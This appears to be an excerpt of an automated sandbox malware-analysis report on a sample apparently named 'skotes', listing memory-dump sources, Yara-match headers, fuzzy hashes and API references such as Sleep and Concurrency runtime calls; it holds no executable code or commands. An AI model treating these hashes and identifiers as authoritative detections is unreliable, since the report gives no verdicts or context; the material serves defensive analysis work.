                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                            • Opcode ID: e0d042ed2406e8e4fffe0d1a7be0c7e120e169d1a1f2a172edad20639e76e823
                                                                                                                                                                                            • Instruction ID: 77a5890037be4a11bfb6499588f8796bd2410cc236ea6d4ec3870b5ba38d2e20
                                                                                                                                                                                            • Opcode Fuzzy Hash: e0d042ed2406e8e4fffe0d1a7be0c7e120e169d1a1f2a172edad20639e76e823
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0F471E40A10ABC705BB68CC17B4E7B76EB07B60F84035CE821672D1EB701A4047D6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: eeec919db3cb3ed577691bca1c874ded33f9112237e22a5711992ce57076dbcf
                                                                                                                                                                                            • Instruction ID: c3c8b6fe36515679822efeb2f50efe6f2e8c5b3eac477b933bc306b8adddebc7
                                                                                                                                                                                            • Opcode Fuzzy Hash: eeec919db3cb3ed577691bca1c874ded33f9112237e22a5711992ce57076dbcf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 452138AB10C914BEA25AC5415B5CAF677AEF5CB23033288ABF003E7502D3C44A098271
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 912faefd6b60317bef0c8d9d4f4c557ccc7eecfcbd89d3d28dc7c8fc3142cf56
                                                                                                                                                                                            • Instruction ID: 0b80f96c41f25c042dc86ae917a055b0b9710f1f6f7422dd759abec05578b474
                                                                                                                                                                                            • Opcode Fuzzy Hash: 912faefd6b60317bef0c8d9d4f4c557ccc7eecfcbd89d3d28dc7c8fc3142cf56
                                                                                                                                                                                            • Instruction Fuzzy Hash: DC2108AB14C914BDA25AC5415B5CAF677AEF5CB331331886AF403E7502D3D44A4A8271
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3eb3e1976bbab0606519d981a2ab7a16814242789a17cc68dd992e2fe35d93e9
                                                                                                                                                                                            • Instruction ID: b6aa0abcd3e2b07ce4008e7562d8ef8492700cbe30069255e9089d4e538867a4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eb3e1976bbab0606519d981a2ab7a16814242789a17cc68dd992e2fe35d93e9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F11D2EB10C8147EA166D1816F5CAF667AFE2DA2307318866F403E3502D7C50A495271
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3a7603205b3797226b37ea13bbbd5f3a7263e7d473d68ce7d26bf07a36010e2e
                                                                                                                                                                                            • Instruction ID: 465a8b7b12d7140673024085c1d9f30fbca805c09fba1490216bb2c5d3d53953
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a7603205b3797226b37ea13bbbd5f3a7263e7d473d68ce7d26bf07a36010e2e
                                                                                                                                                                                            • Instruction Fuzzy Hash: CD1102EF10C9147DA15681812F2CAF66BAEF1CB23033188ABF403E6502E3C90A0A5271
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 65c9c7eb02c63cdf89629b84b8e51c7f90697a2f5cc1175cd13b8d7d118bd5ae
                                                                                                                                                                                            • Instruction ID: 4d02c5ea18889f0b887eb8e7ba8d1eb106787d25c96cdf8fbf811f45c49cec21
                                                                                                                                                                                            • Opcode Fuzzy Hash: 65c9c7eb02c63cdf89629b84b8e51c7f90697a2f5cc1175cd13b8d7d118bd5ae
                                                                                                                                                                                            • Instruction Fuzzy Hash: 271106EB14C9147D6156D1812F1CAFA67AFE1CB230332886BF403E7402E7C50A095271
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a04820a4cdacb259b2d72eb839fa265fcded7540e2dbb29f4f58aae2b6c63645
                                                                                                                                                                                            • Instruction ID: 5e41400bef891da5e9c7d6bd652ad48a7891345d942611df9d8148047046d4ab
                                                                                                                                                                                            • Opcode Fuzzy Hash: a04820a4cdacb259b2d72eb839fa265fcded7540e2dbb29f4f58aae2b6c63645
                                                                                                                                                                                            • Instruction Fuzzy Hash: 451104EB10C9107EA15AC5816F5CAF677EFF6DB23133188ABF403E6502E7C50A4A9271
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 7fa3c5a6eefdb9481ee830a2d831397ae4e62d7b9fe89a9d4c80f099cc81fb76
                                                                                                                                                                                            • Instruction ID: 3fb95b7267420dae115abe35f1818df8ea277f02339cbd1ebe0a22ffff7776c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fa3c5a6eefdb9481ee830a2d831397ae4e62d7b9fe89a9d4c80f099cc81fb76
                                                                                                                                                                                            • Instruction Fuzzy Hash: C8113BAB10C9146EA26695916B5CAF77BEFF5DB2303318C97F043E7402D3D51A099371
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 81f6b6543e2e06e860595824edeb8173a769815b05d12580fe804a3f13fbbca2
                                                                                                                                                                                            • Instruction ID: e818ccb84b6b7a02193bfd44e8618031163ee0e789a03bad10f1911335973a84
                                                                                                                                                                                            • Opcode Fuzzy Hash: 81f6b6543e2e06e860595824edeb8173a769815b05d12580fe804a3f13fbbca2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F0ACAB10CB10AFE2A192E1170C1F777EAF95B13132148ABF042D3002D7C91A054371
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2685012971.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_51e0000_skotes.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a9bfdc8117d18d8b37b3d055fd99cfae7091f06e6d12f68da6f1ab42de2e7ce8
                                                                                                                                                                                            • Instruction ID: 2da781d2f3143c9c580771abdc73423fc3d3076cf5fe2b49824e95f0dee1541a
                                                                                                                                                                                            • Opcode Fuzzy Hash: a9bfdc8117d18d8b37b3d055fd99cfae7091f06e6d12f68da6f1ab42de2e7ce8
                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F097AF10C910AEA1A692D11B1C2F277DEF4AB1313314887F083E2502E7C90E069372
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00620F16
                                                                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00620F62
                                                                                                                                                                                              • Part of subcall function 0062265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00622750
                                                                                                                                                                                            • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00620FCE
                                                                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00620FEA
                                                                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0062103E
                                                                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0062106B
                                                                                                                                                                                            • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 006210C1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                            • API String ID: 2943730970-3887548279
                                                                                                                                                                                            • Opcode ID: 207e8b35b0779965bea81c55741582e51af45e5862785b4636fa1c5a5afe492f
                                                                                                                                                                                            • Instruction ID: f7f5a550286d9211b2894196a3360b27d62a66d1651b25c0b9daabbe6dfcd4bf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 207e8b35b0779965bea81c55741582e51af45e5862785b4636fa1c5a5afe492f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05B17E70A00A25EFDB28CF58E991AB9B7B6FF45300F14816DE906AB341D730AD91CF94
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00622CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00622D0F
                                                                                                                                                                                            • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00621614
                                                                                                                                                                                              • Part of subcall function 00622E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00622E39
                                                                                                                                                                                              • Part of subcall function 00622E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00622EA8
                                                                                                                                                                                            • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00621746
                                                                                                                                                                                            • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006217A6
                                                                                                                                                                                            • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006217B2
                                                                                                                                                                                            • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 006217ED
                                                                                                                                                                                            • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0062180E
                                                                                                                                                                                            • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0062181A
                                                                                                                                                                                            • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00621823
                                                                                                                                                                                            • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0062183B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
